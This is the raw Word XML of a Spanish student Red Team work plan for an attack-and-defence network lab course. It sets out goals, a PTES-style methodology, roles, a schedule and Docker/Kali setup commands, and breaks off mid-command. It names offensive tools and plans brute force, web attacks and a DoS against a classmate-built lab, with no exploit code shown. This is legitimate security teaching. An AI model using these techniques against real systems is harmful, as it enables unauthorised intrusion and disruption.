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F5E5A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PROYECTO FINAL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulación de ataque y defensa en redes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan de trabajo — Equipo Red Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Redes 2 · 2026 · Sábado</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Documento borrador (MVP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="1600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Fechas clave</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5F5E5A"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisión previa: 16 de mayo · Entrega final: 23 de mayo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabla de contenidos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Para actualizar la tabla en Word: clic derecho sobre ella → Actualizar campos.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Introducción y contexto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este documento concentra la planificación, organización y ejecución técnica del equipo Red Team para el Proyecto Final del curso de Redes 2. El objetivo del proyecto es simular un escenario realista de ataque y defensa dentro de un laboratorio aislado, con el equipo Red Team ejecutando técnicas controladas de reconocimiento, explotación y denegación de servicio sobre la infraestructura preparada por el equipo Blue Team.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El alcance del Red Team se limita a las actividades ofensivas dentro del laboratorio. La configuración del servidor, los clientes, el firewall y los mecanismos de detección quedan a cargo del Blue Team. Toda actividad fuera del laboratorio queda explícitamente prohibida según las reglas del proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.1 Objetivos del equipo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identificar al menos cuatro vulnerabilidades en la infraestructura objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ejecutar mínimo cuatro de las técnicas ofensivas listadas en la guía (el proyecto exige tres; ejecutamos una más como margen de calidad).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Documentar cada hallazgo con evidencia técnica (capturas, comandos y salidas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Coordinar con el Blue Team las ventanas de ataque, especialmente la de denegación de servicio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entregar un informe técnico claro, con vulnerabilidades, evidencias, técnicas e impacto logrado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.2 Recursos disponibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cisco Packet Tracer (referencia conceptual del entorno; no se usa para la simulación principal de ataque).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Docker como plataforma de virtualización ligera, por restricciones de recursos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kali Linux como contenedor base con todas las herramientas ofensivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Red Docker bridge dedicada para el laboratorio (lab-net).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Alcance y metodología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La metodología sigue una versión simplificada del PTES (Penetration Testing Execution Standard), adaptada al alcance del proyecto. Cada fase produce evidencia que alimenta directamente las secciones del informe final exigido por el docente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.1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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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Resultado esperado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Reconocimiento</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Hosts activos, información del entorno</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Escaneo y enumeración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Mapa de servicios, versiones, posibles vulnerabilidades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Acceso y explotación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Compromiso de credenciales o servicios web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Denegación de servicio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Interrupción medida y controlada del servicio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Post-explotación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Evaluación del alcance del compromiso (si aplica)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Documentación y reporte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Informe final con evidencias y análisis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.2 Reglas internas del Red Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toda actividad ofensiva ocurre exclusivamente dentro de la red Docker dedicada (lab-net).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cada acción se registra en bitácora con timestamp, comando ejecutado y salida obtenida.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Las capturas de pantalla deben mostrar la terminal completa, no recortes mínimos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de un ataque disruptivo (como DoS) se notifica al Blue Team y se acuerda la ventana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No se exfiltra información real; cualquier prueba de impacto usa archivos sintéticos del laboratorio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Organización del equipo Red Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El equipo está conformado por entre 5 y 6 integrantes. Los roles que se describen a continuación son de coordinación y especialización, no de exclusividad: todos los miembros participan en las fases ofensivas.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Rol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="65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Responsabilidad principal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Líder / Coordinador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Cronograma, comunicación con docente y Blue Team, integración del informe final.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Recon &amp; Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Descubrimiento de hosts, escaneo de puertos y servicios, fingerprinting con nmap.</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Enumeración &amp; Web</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Análisis de servicios, ataque web con nikto, gobuster, sqlmap.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Explotación &amp; Brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Ataques a credenciales con hydra, uso de Metasploit cuando aplique.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DoS &amp; OPSEC</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Coordinación y ejecución del playbook de DoS, control de evidencias.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Documentación técnica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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Redacción, formato del informe, control de versiones del documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nota: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si el equipo es de 5 personas, los roles "Recon &amp; Scanning" y "Enumeración &amp; Web" se fusionan en uno solo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Cronograma de trabajo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Considerando la fecha de revisión previa (16 de mayo) y la entrega final (23 de mayo), el trabajo se distribuye en tres semanas con hitos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160"/>
        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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Semana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Periodo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Actividades clave</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Hito</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 — 9 mayo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Setup de Docker y Kali, coordinación con Blue Team, reconocimiento, primer escaneo.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Laboratorio operativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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9 — 16 mayo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Escaneo profundo, enumeración, primeros intentos de acceso, borrador del informe.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Revisión previa con docente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16 — 22 mayo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Ataques finales (incluye DoS), recolección de evidencias, redacción y revisión.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Informe listo para entrega</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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23 mayo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="51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Entrega final del documento.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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Entrega</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Infraestructura del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El equipo Red Team opera desde un contenedor Kali Linux conectado a una red Docker bridge (lab-net). Esta misma red contiene la infraestructura objetivo configurada por el Blue Team. Toda comunicación entre atacante y víctima ocurre dentro de este segmento aislado del host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Diagrama de la arquitectura</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="3429000"/>
            <wp:effectExtent t="0" r="0" b="0" l="0"/>
            <wp:docPr id="1" name="diagrama_arquitectura" descr="Diagrama de la arquitectura: operador Red Team con contenedor Kali Linux conectado a través de la red Docker lab-net a la zona objetivo del Blue Team." title="Arquitectura del laboratorio Red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F5E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1. Arquitectura del laboratorio Red Team y su conexión con la zona objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Componentes del lado Red Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Host del operador: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">equipo del estudiante con Docker Engine instalado. Sirve únicamente como anfitrión del contenedor de ataque; no participa directamente en las acciones ofensivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Contenedor Kali Linux: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">imagen oficial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">kalilinux/kali-rolling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Con capabilities </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">NET_ADMIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">NET_RAW</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> habilitadas para permitir SYN scans, hping3 y otras herramientas que manejan paquetes raw.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Red lab-net: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">red Docker bridge dedicada con subred </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">172.20.0.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Aísla el tráfico del laboratorio del resto del host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Componentes del lado objetivo (referencia)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Servidor con SSH y HTTP (configurado por el Blue Team).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uno o dos clientes en la misma red interna.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="280"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capa defensiva: firewall, hardening, monitoreo de logs (Blue Team).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Setup técnico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.1 Crear la red Docker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de levantar cualquier contenedor, el equipo crea la red Docker compartida. El Blue Team debe conectar sus contenedores a esta misma red para que el laboratorio funcione como un único segmento.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">docker network create --subnet 172.20.0.0/24 lab-net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6.2 Levantar el contenedor Kali</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El contenedor de ataque se levanta con las capabilities necesarias y una IP fija dentro de la red.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">docker run -it --rm \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  --name kali-attacker \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  --network lab-net \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  --ip 172.20.0.10 \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="12" w:space="6"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:line="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
